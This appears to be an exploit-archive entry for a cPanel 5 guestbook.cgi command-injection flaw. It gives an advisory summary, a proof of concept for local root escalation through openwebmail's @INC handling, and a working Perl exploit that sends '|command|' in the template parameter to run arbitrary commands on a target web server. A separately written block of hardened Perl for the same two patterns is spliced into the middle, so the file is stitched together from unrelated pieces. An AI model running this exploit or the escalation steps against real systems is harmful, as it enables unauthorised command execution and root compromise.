
77 lines
No EOL
2.8 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/6882/info

A remote command execution vulnerability has been discovered in the cPanel CGI application. This issue occurs due to insufficient sanitization of externally supplied data passed to the 'guestbook.cgi' script.

An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.

This vulnerability has been reported to affect cPanel version 5; previous versions may also be affected.

#!/usr/bin/perl
#
# ------- start here -------
#
# Bug found by: pokleyzz
#
# Cpanel is a web hosting control panel which allows clients to manage their web accounts through
# a web interface. Most of the applications are written in perl and compiled to binary.
#
# Details
# =======
# There are multiple vulnerabilities in this package, as described below.
#
# 1) Remote command execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
#
# There is a classic perl open() function vulnerability in the template variable which allows any
# user to read any file or run commands as the system user assigned to the specific url
# in the apache configuration.
#
# 2) Local privilege escalation (root)
#
# Cpanel comes with the openwebmail package as one of its web-based email readers, which is suid root.
# On a system with suid perl installed properly (with suid mode turned on), a local user may
# include their own perl script when running the openwebmail script (oom) through suidperl.
#
# Openwebmail appends to the perl include path (@INC) based on the SCRIPT_FILENAME environment variable,
# then includes some files when executed.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create a file openwebmail-shared.pl containing the perl script you want to execute.
# ii) Set SCRIPT_FILENAME to point to the full path of the openwebmail-shared.pl file you just created.
# iii) exec the oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks to p0ng p0ng@brasnet.org
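Added example (not code from the advisory, from cPanel or from Openwebmail): hardened forms of the two patterns the header describes. Part (a) replaces the SCRIPT_FILENAME-derived @INC entry with a canonicalised path that must sit under a fixed install root; part (b) replaces the two-argument open() on a user-supplied template name with an allow-listed name, a fixed template directory and a three-argument read-only open(). The install layout is a throw-away temporary directory constructed for the demo, and the names $INSTALL_DIR, $TEMPLATE_DIR, resolve_script_dir() and load_template() are assumptions made for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);
use Cwd qw(realpath);

# Constructed layout for the demo: a temporary install root with a templates/
# subdirectory holding one template. In a real deployment these are fixed,
# deploy-time constants, never derived from the request or the environment.
my $INSTALL_DIR  = tempdir(CLEANUP => 1);
my $TEMPLATE_DIR = File::Spec->catdir($INSTALL_DIR, 'templates');
mkdir $TEMPLATE_DIR or die "mkdir: $!";
{
    open(my $fh, '>', File::Spec->catfile($TEMPLATE_DIR, 'default.tmpl')) or die "open: $!";
    print $fh "<html>default template</html>\n";
    close $fh;
}

# (a) Library directory. The advisory's oom takes it from SCRIPT_FILENAME or $0
#     and pushes it straight onto @INC. If a candidate must be accepted at all,
#     canonicalise it (resolving symlinks and '..') and require it to be the
#     fixed root or a subdirectory of it. Returns the directory or undef.
sub resolve_script_dir {
    my ($candidate) = @_;
    return undef unless defined $candidate;
    my $real = realpath($candidate);
    my $root = realpath($INSTALL_DIR);
    return undef unless defined $real && defined $root;   # nonexistent path
    return undef unless $real eq $root || index($real, "$root/") == 0;
    return $real;
}

# (b) Template loader. With open(FH, $name) the mode is taken from $name, so a
#     leading '|' runs a pipeline and '<' or '>' redirects. Here the name is
#     restricted to a short token (which also untaints it under -T), mapped to a
#     file inside $TEMPLATE_DIR, and opened with an explicit '<' mode.
sub load_template {
    my ($name) = @_;
    return undef unless defined $name && $name =~ /\A([A-Za-z0-9_-]{1,64})\z/;
    my $path = File::Spec->catfile($TEMPLATE_DIR, "$1.tmpl");
    open(my $fh, '<', $path) or return undef;
    local $/;                                   # slurp the whole file
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Demo with constructed inputs: accepted ones resolve under the root or to an
# existing allow-listed template, everything else is rejected.
for my $dir ($INSTALL_DIR, "$INSTALL_DIR/templates", '/tmp', "$INSTALL_DIR/..") {
    my $ok = resolve_script_dir($dir);
    printf "%-40s -> %s\n", $dir, defined $ok ? "accepted ($ok)" : 'rejected';
}
for my $name ('default', '|id', '../../etc/passwd', 'missing') {
    my $body = load_template($name);
    printf "%-20s -> %s\n", $name, defined $body ? 'loaded' : 'rejected';
}
```

The allow-list regex does double duty under `perl -T`: the captured `$1` is the only untainted value that reaches open(), so taint checking enforces that no request-controlled byte other than the validated token influences the path. The realpath() check in part (a) is the last line of defence; the actual fix for the @INC issue is to hard-code the library directory and not consult SCRIPT_FILENAME or $0 at all.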

use strict;
use warnings;
use IO::Socket::INET;

my $url = $ARGV[0];   # target host
my $cmd = $ARGV[1];   # command, URL-encoded (use %20 for spaces)

if (@ARGV != 2) {
    print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
    print " use %20 for spaces.\n";
    print " usage: $0 <host> <cmd>\n";
    exit;
}

my $rem = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $url,
    PeerPort => "80");

my @resp;
if ($rem) {
    # template value is passed to the script's open() call (see item 1 above)
    print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
    @resp = <$rem>;
}

print "@resp\n\n";